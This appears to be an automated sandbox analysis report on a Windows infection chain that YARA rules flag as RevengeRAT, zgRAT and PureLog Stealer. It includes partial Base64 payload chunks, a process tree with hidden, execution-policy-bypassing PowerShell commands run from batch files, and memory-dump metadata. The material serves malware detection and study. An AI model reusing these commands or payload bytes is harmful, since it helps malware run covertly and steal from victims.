                                                                                          2024-12-11 10:25:37 UTC1378INData Raw: 49 44 39 43 44 77 42 76 58 77 41 41 43 67 41 6c 49 44 39 43 44 77 42 76 59 41 41 41 43 67 43 41 43 51 41 41 42 48 34 4a 41 41 41 45 66 67 45 41 41 41 52 2b 41 67 41 41 42 43 68 68 41 41 41 4b 62 32 49 41 41 41 6f 41 46 34 41 4b 41 41 41 45 4b 41 34 41 41 41 59 6f 49 41 41 41 42 67 41 55 2f 67 59 65 41 41 41 47 63 32 4d 41 41 41 6f 4b 42 68 51 67 4d 48 55 41 41 43 41 77 64 51 41 41 63 32 51 41 41 41 71 41 44 41 41 41 42 48 4e 6c 41 41 41 4b 67 41 73 41 41 41 51 41 33 68 59 6d 41 42 61 41 43 67 41 41 42 43 43 34 43 77 41 41 4b 42 45 41 41 41 6f 41 41 4e 34 41 41 48 34 4b 41 41 41 45 46 76 34 42 43 77 63 36 45 66 2f 2f 2f 7a 67 33 41 51 41 41 41 41 42 2b 43 51 41 41 42 42 55 57 62 32 59 41 41 41 6f 73 44 58 34 4a 41 41 41 45 62 32 63 41 41 41 6f 57 4d 51 39
                                                                                          Data Ascii: ID9CDwBvXwAACgAlID9CDwBvYAAACgCACQAABH4JAAAEfgEAAAR+AgAABChhAAAKb2IAAAoAF4AKAAAEKA4AAAYoIAAABgAU/gYeAAAGc2MAAAoKBhQgMHUAACAwdQAAc2QAAAqADAAABHNlAAAKgAsAAAQA3hYmABaACgAABCC4CwAAKBEAAAoAAN4AAH4KAAAEFv4BCwc6Ef///zg3AQAAAAB+CQAABBUWb2YAAAosDX4JAAAEb2cAAAoWMQ9
                                                                                          2024-12-11 10:25:37 UTC1378INData Raw: 45 41 63 33 45 41 41 41 6f 4b 63 32 55 41 41 41 6f 4c 63 32 55 41 41 41 6f 4d 41 69 67 59 41 41 41 47 41 78 55 58 4b 42 67 41 41 41 6f 4e 42 77 49 57 43 52 61 61 62 32 77 41 41 41 70 76 61 67 41 41 43 67 41 49 41 67 6b 57 6d 6d 39 73 41 41 41 4b 41 32 39 73 41 41 41 4b 57 41 4b 4f 61 51 6b 57 6d 6d 39 73 41 41 41 4b 41 32 39 73 41 41 41 4b 57 46 6c 76 61 67 41 41 43 67 41 47 42 32 39 72 41 41 41 4b 62 33 49 41 41 41 6f 41 42 67 68 76 61 77 41 41 43 6d 39 79 41 41 41 4b 41 41 64 76 56 67 41 41 43 67 41 49 62 31 59 41 41 41 6f 41 42 6d 39 7a 41 41 41 4b 45 77 51 72 41 42 45 45 4b 69 35 7a 49 77 41 41 42 6f 41 55 41 41 41 45 4b 69 49 43 4b 42 59 41 41 41 6f 41 4b 6a 59 41 66 67 59 41 41 41 52 76 64 41 41 41 43 67 41 71 49 67 49 6f 46 67 41 41 43 67 41 71 61
                                                                                          Data Ascii: EAc3EAAAoKc2UAAAoLc2UAAAoMAigYAAAGAxUXKBgAAAoNBwIWCRaab2wAAApvagAACgAIAgkWmm9sAAAKA29sAAAKWAKOaQkWmm9sAAAKA29sAAAKWFlvagAACgAGB29rAAAKb3IAAAoABghvawAACm9yAAAKAAdvVgAACgAIb1YAAAoABm9zAAAKEwQrABEEKi5zIwAABoAUAAAEKiICKBYAAAoAKjYAfgYAAARvdAAACgAqIgIoFgAACgAqa
                                                                                          2024-12-11 10:25:37 UTC1378INData Raw: 41 43 49 41 41 67 45 41 41 48 6f 44 41 41 42 74 41 42 59 41 4a 51 41 44 41 52 41 41 46 77 41 41 41 44 30 41 47 67 41 6c 41 42 4d 42 41 41 42 73 41 41 41 41 6a 51 41 62 41 43 63 41 45 77 45 41 41 47 38 42 41 41 43 4e 41 42 73 41 4a 77 41 54 41 51 41 41 30 41 45 41 41 49 30 41 47 77 41 6e 41 42 4d 42 41 41 44 73 41 51 41 41 6a 51 41 62 41 43 63 41 45 77 45 41 41 46 49 43 41 41 43 4e 41 42 73 41 4a 77 41 54 41 51 41 41 79 51 41 41 41 49 30 41 47 77 41 6e 41 42 59 41 58 67 31 68 41 52 59 41 53 51 31 68 41 52 59 41 50 51 52 68 41 52 59 41 7a 77 31 68 41 52 59 41 48 41 35 68 41 52 59 41 77 67 31 34 41 68 59 41 69 41 70 68 41 52 59 41 4e 77 68 38 41 68 45 41 42 41 32 41 41 68 59 41 4d 51 53 45 41 68 45 41 70 41 69 48 41 68 45 41 73 77 79 4c 41 6a 4d 42 4f 51 4f
                                                                                          Data Ascii: ACIAAgEAAHoDAABtABYAJQADARAAFwAAAD0AGgAlABMBAABsAAAAjQAbACcAEwEAAG8BAACNABsAJwATAQAA0AEAAI0AGwAnABMBAADsAQAAjQAbACcAEwEAAFICAACNABsAJwATAQAAyQAAAI0AGwAnABYAXg1hARYASQ1hARYAPQRhARYAzw1hARYAHA5hARYAwg14AhYAiAphARYANwh8AhEABA2AAhYAMQSEAhEApAiHAhEAswyLAjMBOQO
                                                                                          2024-12-11 10:25:37 UTC1378INData Raw: 45 41 6d 77 55 41 41 41 45 41 77 77 77 41 41 41 45 41 73 77 4d 41 41 41 45 41 39 41 30 41 41 41 49 41 69 41 6f 41 41 41 45 41 79 77 6b 41 41 41 49 41 30 77 4d 4a 41 4e 6f 4b 41 51 41 52 41 4e 6f 4b 42 67 41 5a 41 4e 6f 4b 43 67 41 70 41 4e 6f 4b 45 41 41 78 41 4e 6f 4b 45 41 41 35 41 4e 6f 4b 45 41 42 42 41 4e 6f 4b 45 41 42 4a 41 4e 6f 4b 45 41 42 52 41 4e 6f 4b 45 41 42 5a 41 4e 6f 4b 45 41 42 68 41 4e 6f 4b 46 51 42 70 41 4e 6f 4b 45 41 42 78 41 4e 6f 4b 45 41 43 42 41 4e 6f 4b 42 67 43 4a 41 4e 6f 4b 42 67 43 35 41 4e 6f 4b 42 67 41 68 41 64 6f 4a 48 77 43 68 41 4e 6f 4b 4a 41 41 70 41 65 77 4d 48 77 43 52 41 4e 6f 4b 4c 41 41 78 41 64 30 4d 4d 67 42 35 41 4e 6f 4b 42 67 43 70 41 4e 6f 4b 42 67 41 35 41 64 63 4d 53 41 42 4a 41 58 51 4f 55 77 43 70 41
                                                                                          Data Ascii: EAmwUAAAEAwwwAAAEAswMAAAEA9A0AAAIAiAoAAAEAywkAAAIA0wMJANoKAQARANoKBgAZANoKCgApANoKEAAxANoKEAA5ANoKEABBANoKEABJANoKEABRANoKEABZANoKEABhANoKFQBpANoKEABxANoKEACBANoKBgCJANoKBgC5ANoKBgAhAdoJHwChANoKJAApAewMHwCRANoKLAAxAd0MMgB5ANoKBgCpANoKBgA5AdcMSABJAXQOUwCpA
                                                                                          2024-12-11 10:25:37 UTC1378INData Raw: 44 77 42 41 56 67 41 41 45 41 42 51 56 67 41 41 45 51 42 59 56 67 41 41 45 67 42 67 56 67 41 41 45 77 41 45 67 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 6f 42 51 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 56 51 4c 56 41 77 41 41 41 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 56 41 73 55 49 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 46 34 43 43 77 30 41 41 41 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 56 51 4c 67 43 77 41 41 41 41 41 4b 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 65 41 76 30 44 41 41 41 41 41 41 73 41 41 67 41 4d 41 41 63 41 44 51 41 4a 41 41 34 41 43 67 41 50 41 41 6f 41 45 41 41 4b 41 42 45 41 43 67 41 53 41 41 6f 41 45 77 41 4b 41 41 41 41 41 41 41 41 50 44 34
                                                                                          Data Ascii: DwBAVgAAEABQVgAAEQBYVgAAEgBgVgAAEwAEgAAAAQAAAAAAAAAAAAAAAAAoBQAABAAAAAAAAAAAAAAAVQLVAwAAAAAEAAAAAAAAAAAAAABVAsUIAAAAAAQAAAAAAAAAAAAAAF4CCw0AAAAABAAAAAAAAAAAAAAAVQLgCwAAAAAKAAAAAAAAAAAAAABeAv0DAAAAAAsAAgAMAAcADQAJAA4ACgAPAAoAEAAKABEACgASAAoAEwAKAAAAAAAAPD4
                                                                                          2024-12-11 10:25:37 UTC1378INData Raw: 55 31 4d 45 55 31 4e 55 4d 79 51 7a 67 33 4f 55 59 79 4d 6a 4d 79 4f 54 6c 46 51 6a 45 31 4e 30 56 45 4e 54 67 78 4d 7a 46 47 4e 44 6c 45 4e 7a 56 44 51 7a 68 45 52 44 68 46 41 45 56 59 52 55 4e 56 56 45 6c 50 54 6c 39 54 56 45 46 55 52 51 42 48 41 45 67 41 52 31 5a 4a 41 45 6f 41 54 51 42 4f 41 46 4e 35 63 33 52 6c 62 53 35 4a 54 77 42 4a 55 41 42 52 41 45 56 54 58 30 4e 50 54 6c 52 4a 54 6c 56 50 56 56 4d 41 56 41 42 48 5a 58 52 42 56 67 42 48 52 6c 63 41 57 41 42 32 59 57 78 31 5a 56 39 66 41 45 64 6c 64 45 4e 68 62 57 56 79 59 51 42 74 63 32 4e 76 63 6d 78 70 59 67 41 38 50 6d 4d 41 55 33 6c 7a 64 47 56 74 4c 6b 4e 76 62 47 78 6c 59 33 52 70 62 32 35 7a 4c 6b 64 6c 62 6d 56 79 61 57 4d 41 54 57 6c 6a 63 6d 39 7a 62 32 5a 30 4c 6c 5a 70 63 33 56 68 62
                                                                                          Data Ascii: U1MEU1NUMyQzg3OUYyMjMyOTlFQjE1N0VENTgxMzFGNDlENzVDQzhERDhFAEVYRUNVVElPTl9TVEFURQBHAEgAR1ZJAEoATQBOAFN5c3RlbS5JTwBJUABRAEVTX0NPTlRJTlVPVVMAVABHZXRBVgBHRlcAWAB2YWx1ZV9fAEdldENhbWVyYQBtc2NvcmxpYgA8PmMAU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMATWljcm9zb2Z0LlZpc3Vhb


                                                                                          Target ID:0
                                                                                          Start time:05:24:57
                                                                                          Start date:11/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\stage2.ps1"
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 00000000.00000002.1897758677.000001C2CE4E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1897758677.000001C2CE4E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000000.00000002.1897758677.000001C2CE4E0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1883635223.000001C2C68BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_RevengeRAT, Description: Yara detected RevengeRAT, Source: 00000000.00000002.1860455437.000001C2B7B84000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Revengerat_db91bcc6, Description: unknown, Source: 00000000.00000002.1860455437.000001C2B7B84000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:1
                                                                                          Start time:05:24:57
                                                                                          Start date:11/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:2
                                                                                          Start time:05:25:13
                                                                                          Start date:11/12/2024
                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                                                                          Imagebase:0x450000
                                                                                          File size:2'141'552 bytes
                                                                                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_RevengeRAT, Description: Yara detected RevengeRAT, Source: 00000002.00000002.4115369632.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Revengerat_db91bcc6, Description: unknown, Source: 00000002.00000002.4115369632.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_RevengeRAT, Description: Yara detected RevengeRAT, Source: 00000002.00000002.4116375776.0000000007242000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_RevengeRAT, Description: Yara detected RevengeRAT, Source: 00000002.00000002.4116375776.00000000071E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:moderate
                                                                                          Has exited:false

                                                                                          Target ID:6
                                                                                          Start time:05:25:26
                                                                                          Start date:11/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\ProgramData\PDF\1.bat" "
                                                                                          Imagebase:0x7ff6901a0000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:7
                                                                                          Start time:05:25:26
                                                                                          Start date:11/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:8
                                                                                          Start time:05:25:26
                                                                                          Start date:11/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"
                                                                                          Imagebase:0x7ff6901a0000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:9
                                                                                          Start time:05:25:26
                                                                                          Start date:11/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:10
                                                                                          Start time:05:25:29
                                                                                          Start date:11/12/2024
                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                                                                          Imagebase:0x450000
                                                                                          File size:2'141'552 bytes
                                                                                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_RevengeRAT, Description: Yara detected RevengeRAT, Source: 0000000A.00000002.2001377795.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Revengerat_db91bcc6, Description: unknown, Source: 0000000A.00000002.2001377795.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          Target ID:11
                                                                                          Start time:05:25:34
                                                                                          Start date:11/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\ProgramData\PDF\1.bat" "
                                                                                          Imagebase:0x7ff6901a0000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:12
                                                                                          Start time:05:25:34
                                                                                          Start date:11/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:13
                                                                                          Start time:05:25:34
                                                                                          Start date:11/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"
                                                                                          Imagebase:0x7ff6901a0000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:14
                                                                                          Start time:05:25:34
                                                                                          Start date:11/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:15
                                                                                          Start time:05:25:37
                                                                                          Start date:11/12/2024
                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                                                                          Imagebase:0x450000
                                                                                          File size:2'141'552 bytes
                                                                                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_RevengeRAT, Description: Yara detected RevengeRAT, Source: 0000000F.00000002.2076815296.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Revengerat_db91bcc6, Description: unknown, Source: 0000000F.00000002.2076815296.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                          Has exited:true

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1899412971.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b950000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4da6d80fedcc1b2bef27f73e3795b369a157fc856758ed94cdf5db182d167309
                                                                                            • Instruction ID: 359c43d9d84a3809fac08b07afb5ee62306e56f2bc80133087980c999cc96c57
                                                                                            • Opcode Fuzzy Hash: 4da6d80fedcc1b2bef27f73e3795b369a157fc856758ed94cdf5db182d167309
                                                                                            • Instruction Fuzzy Hash: 4B715562B2FA8E1FEBB896EC18352B83BC1EF55750B1900BED81DC30E2DD48AD458341
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1899412971.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b950000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1898819114.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1899412971.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b950000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1899412971.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b950000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1899412971.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b950000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1898819114.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1898819114.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1898819114.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: N_^?$N_^E$N_^M$N_^O$N_^Q
                                                                                            • API String ID: 0-843839831

                                                                                            Execution Graph

                                                                                            Execution Coverage:15.5%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:27
                                                                                            Total number of Limit Nodes:2

                                                                                             Control-flow Graph

                                                                                             (graph node and edge listing not reproduced; nodes are marked Executed / Not Executed in the rendered graph)
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.4116161313.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_5760000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: "
                                                                                            • API String ID: 0-123907689
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.4116161313.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_5760000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: d
                                                                                            • API String ID: 0-2564639436
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.4116161313.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_5760000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.4116161313.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_5760000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:

                                                                                             Control-flow Graph

                                                                                             (graph node and edge listing not reproduced; nodes are marked Executed / Not Executed in the rendered graph; the graph contains the GetVolumeInformationA call listed under APIs below)
                                                                                            APIs
                                                                                            • GetVolumeInformationA.KERNELBASE(?,?,?,?,?,?,?,?), ref: 057623BE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.4116161313.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_5760000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID: InformationVolume
                                                                                            • String ID:
                                                                                            • API String ID: 2039140958-0

                                                                                             Control-flow Graph

                                                                                             (graph node and edge listing not reproduced; nodes are marked Executed / Not Executed in the rendered graph; the graph contains the GetVolumeInformationA call listed under APIs below)
                                                                                            APIs
                                                                                            • GetVolumeInformationA.KERNELBASE(?,?,?,?,?,?,?,?), ref: 057623BE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.4116161313.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_5760000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID: InformationVolume
                                                                                            • String ID:
                                                                                            • API String ID: 2039140958-0

                                                                                             Control-flow Graph

                                                                                             (graph node and edge listing not reproduced; nodes are marked Executed / Not Executed in the rendered graph; the graph contains a GlobalMemoryStatusEx call)
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.4116161313.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_5760000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1bb652f5cdf7b1fd03c7c21e4a12533e9a7a9b68c60382abd34104c6522c5a90
                                                                                            • Instruction ID: 12d45b6d9b5b9884879b25aad92c297ed2fcb39aa20c11c1ed93eda44b79dd63
                                                                                            • Opcode Fuzzy Hash: 1bb652f5cdf7b1fd03c7c21e4a12533e9a7a9b68c60382abd34104c6522c5a90
                                                                                            • Instruction Fuzzy Hash: 4751BC71E043588FCB14DFBAD8446EEBFF1AF89310F24846AE805A7261DB349945CB91

Control-flow Graph
• Nodes and edges: 823 5768370-57683b2 824 57683ba-5768402 GlobalMemoryStatusEx 823->824 825 5768404-576840a 824->825 826 576840b-576844d 824->826 825->826
                                                                                            APIs
                                                                                            • GlobalMemoryStatusEx.KERNELBASE(?), ref: 057683F2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.4116161313.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
